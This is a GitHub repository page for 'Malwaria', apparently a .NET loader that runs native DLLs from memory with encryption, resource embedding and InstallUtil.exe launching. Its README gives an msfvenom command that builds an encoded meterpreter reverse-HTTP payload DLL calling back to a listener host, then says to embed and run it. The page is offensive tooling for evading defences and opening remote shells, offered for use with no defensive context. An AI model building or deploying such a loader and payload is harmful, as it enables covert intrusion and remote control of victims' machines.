Skip to content

hyyly/MemoryModule-C-

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Malwaria

Execute Native DLL from .NET

Based on https://github.com/Scavanger/MemoryModule.net

Added Crypto Support

Added Ability To Execute From Resource

Added Ability to be launched via InstallUtil.exe

Rough Prototype

  1. Create The DLL:
./msfvenom -p windows/meterpreter/reverse_http -e x86/shikata_ga_nai -i 3 -f dll -a x86 LHOST=192.168.249.129 LPORT=8080 > msf.dll
  1. Add DLL To Project

  2. Compile and Execute

About

No description, website, or topics provided.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages